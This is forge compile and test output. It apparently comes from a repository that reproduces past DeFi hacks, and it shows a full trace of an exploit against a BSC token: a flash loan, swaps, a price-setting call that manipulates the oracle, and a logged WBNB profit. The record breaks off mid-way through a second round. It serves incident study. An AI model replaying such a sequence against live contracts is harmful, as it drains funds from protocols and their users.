Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.23s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-05/SellToken_exp.sol:48:31:
   |
48 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-05/SellToken_exp.sol:48:47:
   |
48 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-05/SellToken_exp.sol:48:67:
   |
48 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 678.42ms (1.87ms CPU time)

Ran 1 test for src/test/2023-05/SellToken_exp.sol:SellTokenExp
[PASS] testExp() (gas: 766664)
Logs:
  WBNB cost first: 1.044094989776594473
  WBNB total profit: 3.112948098078880127

Traces:
  [283083] SellTokenExp::setUp()
    ├─ [0] VM::createSelectFork("bsc", 28168034 [2.816e7])
    │   └─ ← [Return] 0
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c)
    │   └─ ← [Return] [0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c], []
    ├─ [0] VM::load(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 13407199363679635973052879518465057167389910613330280238043615909335847287356 [1.34e76])
    ├─ [0] VM::load(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c, 0x0000000000000000000000000000000000000000000000008ac7230489e80000)
    │   └─ ← [Return]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 10000000000000000000 [1e19]
    ├─ [0] 0x0000000000000000000000000000000000000000::fallback{value: 79228162514264337593543950335}()
    │   └─ ← [Stop]
    └─ ← [Stop]

  [963595] SellTokenExp::testExp()
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   └─ ← [Return] 418509475390597934136 [4.185e20]
    ├─ [326658] 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681::flashLoan(418509475390597934136 [4.185e20], 0, SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x61313233343536373839303132333435363738393031323334353637383930)
    │   ├─ [10862] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 418509475390597934136 [4.185e20])
    │   │   ├─ emit Transfer(from: 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, to: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 418509475390597934136 [4.185e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000008ac7230489e80000 → 0x0000000000000000000000000000000000000000000000173ac37986f994ac38
    │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0x000000000000000000000000000000000000000000000016affc56826facac38 → 0
    │   │   └─ ← [Return] true
    │   ├─ [289453] SellTokenExp::DPPFlashLoanCall(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 418509475390597934136 [4.185e20], 0, 0x61313233343536373839303132333435363738393031323334353637383930)
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 428509475390597934136 [4.285e20]
    │   │   ├─ [9195] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(4185094753905979342 [4.185e18])
    │   │   │   ├─ [55] SellTokenExp::receive{value: 4185094753905979342}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdrawal(src: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 4185094753905979342 [4.185e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000173ac37986f994ac38 → 0x00000000000000000000000000000000000000000000001700af0805aba9fc6a
    │   │   │   └─ ← [Stop]
    │   │   ├─ [24420] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [24620] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─ emit Approval(owner: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   └─ ← [Return] true
    │   │   ├─ [86454] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokens(414324380636691954794 [4.143e20], 0, [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c, 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4], SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1683962933 [1.683e9])
    │   │   │   ├─ [2893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 10131261910696925365107624 [1.013e25], 419961013712194393900 [4.199e20], 1683961924 [1.683e9]
    │   │   │   ├─ [8225] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transferFrom(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x358EfC593134f99833C66894cCeCD41F550051b6, 414324380636691954794 [4.143e20])
    │   │   │   │   ├─ emit Transfer(from: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x358EfC593134f99833C66894cCeCD41F550051b6, value: 414324380636691954794 [4.143e20])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xc22189e8e4f25f6e2d0d624cd5e87a544d20ecfc30c6d9d10e73b4f6e18305f3: 0x000000000000000000000000000000000000000000000016c4213cec244c572c → 0x00000000000000000000000000000000000000000000002d3a0921ed460e5396
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000001700af0805aba9fc6a → 0x0000000000000000000000000000000000000000000000008ac7230489e80000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [64367] 0x358EfC593134f99833C66894cCeCD41F550051b6::swap(5025066711831328845319833 [5.025e24], 0, SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [29959] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::transfer(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 5025066711831328845319833 [5.025e24])
    │   │   │   │   │   ├─ emit Transfer(from: 0x358EfC593134f99833C66894cCeCD41F550051b6, to: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 5025066711831328845319833 [5.025e24])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000000042819698c021a8239ce99
    │   │   │   │   │   │   @ 0xb33d8f283be1e1147ebe4c2754d873fe6505755f9763c81dab5b7d9fd662252e: 0x000000000000000000000000000000000000000000086160cf05a4ba2d417ba8 → 0x0000000000000000000000000000000000000000000439476579a29fab07ad0f
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   └─ ← [Return] 5106195198865596519787791 [5.106e24]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   └─ ← [Return] 834285394348886348694 [8.342e20]
    │   │   │   │   ├─ emit Sync(reserve0: 5106195198865596519787791 [5.106e24], reserve1: 834285394348886348694 [8.342e20])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 414324380636691954794 [4.143e20], amount0Out: 5025066711831328845319833 [5.025e24], amount1Out: 0, to: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 10: 0x000000000000000000000000000bf614ebc82fa24f644d4913742bfe252cbf5f → 0x000000000000000000000000000bf6183be6cf3c2b73d7e54f72ecfdc9de71bb
    │   │   │   │   │   @ 9: 0x0000000000000000000000000000000000836254bdfe25dee9102585dbbc916b → 0x000000000000000000000000000000000083626d3108cc1767618bd027001f56
    │   │   │   │   │   @ 8: 0x645f3844000000000016c4213cec244c572c000000086160cf05a4ba2d417ba8 → 0x645f384d00000000002d3a0921ed460e53960000000439476579a29fab07ad0f
    │   │   │   │   └─ ← [Stop]
    │   │   │   └─ ← [Return] [414324380636691954794 [4.143e20], 5025066711831328845319833 [5.025e24]]
    │   │   ├─ [64153] 0x57Db19127617B77c8abd9420b5a35502b59870D6::setTokenPrice(0xa645995e9801F2ca6e2361eDF4c2A138362BADe4)
    │   │   │   ├─ [2602] 0x8D190C70937493046a464440d28f126A4E42eF7f::getPair(0xa645995e9801F2ca6e2361eDF4c2A138362BADe4) [staticcall]
    │   │   │   │   └─ ← [Return] 0x000000000000000000000000bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c
    │   │   │   ├─ [5111] 0x10ED43C718714eb63d5aA57B78B54704E256024E::getAmountsOut(1000000000000000000 [1e18], [0xa645995e9801F2ca6e2361eDF4c2A138362BADe4, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]) [staticcall]
    │   │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 5106195198865596519787791 [5.106e24], 834285394348886348694 [8.342e20], 1683961933 [1.683e9]
    │   │   │   │   └─ ← [Return] [1000000000000000000 [1e18], 162978398960726 [1.629e14]]
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x05145675fdbf74716caf81bfeeff2666c82ac1f59fe4fdbb2aa3d6034769c35b: 0 → 0x0000000000000000000000000000000000000000000000000000943a5d937c56
    │   │   │   │   @ 0x6572bc7ca8954f4b064600a073ae3459ee354e0ac82387cf92e0b80a4f594e33: 0 → 0x00000000000000000000000000000000000000000000000000000000645f386b
    │   │   │   └─ ← [Stop]
    │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 5025066711831328845319833 [5.025e24]
    │   │   ├─ [34478] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(5025066711831328845319833 [5.025e24], 0, [0xa645995e9801F2ca6e2361eDF4c2A138362BADe4, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1683962933 [1.683e9])
    │   │   │   ├─ [3627] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::transferFrom(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x358EfC593134f99833C66894cCeCD41F550051b6, 5025066711831328845319833 [5.025e24])
    │   │   │   │   ├─ emit Transfer(from: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x358EfC593134f99833C66894cCeCD41F550051b6, value: 5025066711831328845319833 [5.025e24])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000000042819698c021a8239ce99 → 0
    │   │   │   │   │   @ 0xb33d8f283be1e1147ebe4c2754d873fe6505755f9763c81dab5b7d9fd662252e: 0x0000000000000000000000000000000000000000000439476579a29fab07ad0f → 0x000000000000000000000000000000000000000000086160cf05a4ba2d417ba8
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 10000000000000000000 [1e19]
    │   │   │   ├─ [893] 0x358EfC593134f99833C66894cCeCD41F550051b6::getReserves() [staticcall]
    │   │   │   │   └─ ← [Return] 5106195198865596519787791 [5.106e24], 834285394348886348694 [8.342e20], 1683961933 [1.683e9]
    │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   └─ ← [Return] 10131261910696925365107624 [1.013e25]
    │   │   │   ├─ [21186] 0x358EfC593134f99833C66894cCeCD41F550051b6::swap(0, 413280285646915360321 [4.132e20], SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [6062] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 413280285646915360321 [4.132e20])
    │   │   │   │   │   ├─ emit Transfer(from: 0x358EfC593134f99833C66894cCeCD41F550051b6, to: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 413280285646915360321 [4.132e20])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000008ac7230489e80000 → 0x000000000000000000000000000000000000000000000016f231a9292a43d641
    │   │   │   │   │   │   @ 0xc22189e8e4f25f6e2d0d624cd5e87a544d20ecfc30c6d9d10e73b4f6e18305f3: 0x00000000000000000000000000000000000000000000002d3a0921ed460e5396 → 0x000000000000000000000000000000000000000000000016d29e9bc8a5b27d55
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [562] 0xa645995e9801F2ca6e2361eDF4c2A138362BADe4::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   └─ ← [Return] 10131261910696925365107624 [1.013e25]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x358EfC593134f99833C66894cCeCD41F550051b6) [staticcall]
    │   │   │   │   │   └─ ← [Return] 421005108701970988373 [4.21e20]
    │   │   │   │   ├─ emit Sync(reserve0: 10131261910696925365107624 [1.013e25], reserve1: 421005108701970988373 [4.21e20])
    │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 5025066711831328845319833 [5.025e24], amount1In: 0, amount0Out: 0, amount1Out: 413280285646915360321 [4.132e20], to: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x645f384d00000000002d3a0921ed460e53960000000439476579a29fab07ad0f → 0x645f384d000000000016d29e9bc8a5b27d55000000086160cf05a4ba2d417ba8
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 423280285646915360321 [4.232e20]
    │   │   │   └─ ← [Stop]
    │   │   ├─ [2074] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::deposit{value: 4185094753905979342}()
    │   │   │   ├─ emit Deposit(dst: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 4185094753905979342 [4.185e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000016f231a9292a43d641 → 0x0000000000000000000000000000000000000000000000172c461aaa782e860f
    │   │   │   └─ ← [Stop]
    │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, 418509475390597934136 [4.185e20])
    │   │   │   ├─ emit Transfer(from: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, value: 418509475390597934136 [4.185e20])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0 → 0x000000000000000000000000000000000000000000000016affc56826facac38
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000172c461aaa782e860f → 0x0000000000000000000000000000000000000000000000007c49c4280881d9d7
    │   │   │   └─ ← [Return] true
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 8955905010223405527 [8.955e18]
    │   │   ├─ emit log_named_decimal_uint(key: "WBNB cost first", val: 1044094989776594473 [1.044e18], decimals: 18)
    │   │   ├─  storage changes:
    │   │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   @ 0x6572bc7ca8954f4b064600a073ae3459ee354e0ac82387cf92e0b80a4f594e33: 0 → 0x00000000000000000000000000000000000000000000000000000000645f386b
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000016f231a9292a43d641 → 0x0000000000000000000000000000000000000000000000172c461aaa782e860f
    │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0 → 0x000000000000000000000000000000000000000000000016affc56826facac38
    │   │   └─ ← [Stop]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 418509475390597934136 [4.185e20]
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 923675098292473509857042 [9.236e23]
    │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 418509475390597934136 [4.185e20]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   │   └─ ← [Return] 923675098292473509857042 [9.236e23]
    │   ├─ emit DODOFlashLoan(: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 418509475390597934136 [4.185e20], : 0)
    │   └─ ← [Stop]
    ├─ [0] VM::warp(1683962033 [1.683e9])
    │   └─ ← [Return]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0xFeAFe253802b77456B4627F8c2306a9CeBb5d681) [staticcall]
    │   └─ ← [Return] 418509475390597934136 [4.185e20]
    ├─ [612250] 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681::flashLoan(418509475390597934136 [4.185e20], 0, SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x616263)
    │   ├─ [6062] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 418509475390597934136 [4.185e20])
    │   │   ├─ emit Transfer(from: 0xFeAFe253802b77456B4627F8c2306a9CeBb5d681, to: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 418509475390597934136 [4.185e20])
    │   │   ├─  storage changes:
    │   │   │   @ 0x95870720a9b5a6420749f02df2d1248f9e2447dd5ed7a5b82d399a1b406f5197: 0x000000000000000000000000000000000000000000000016affc56826facac38 → 0
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000007c49c4280881d9d7 → 0x0000000000000000000000000000000000000000000000172c461aaa782e860f
    │   │   └─ ← [Return] true
    │   ├─ [589291] SellTokenExp::DPPFlashLoanCall(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 418509475390597934136 [4.185e20], 0, 0x616263)
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 427465380400821339663 [4.274e20]
    │   │   ├─ [9195] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(4274653804008213397 [4.274e18])
    │   │   │   ├─ [55] SellTokenExp::receive{value: 4274653804008213397}()
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ emit Withdrawal(src: SellTokenExp: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 4274653804008213397 [4.274e18])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000172c461aaa782e860f → 0x000000000000000000000000000000000000000000000016f0f37bade27ffa7a
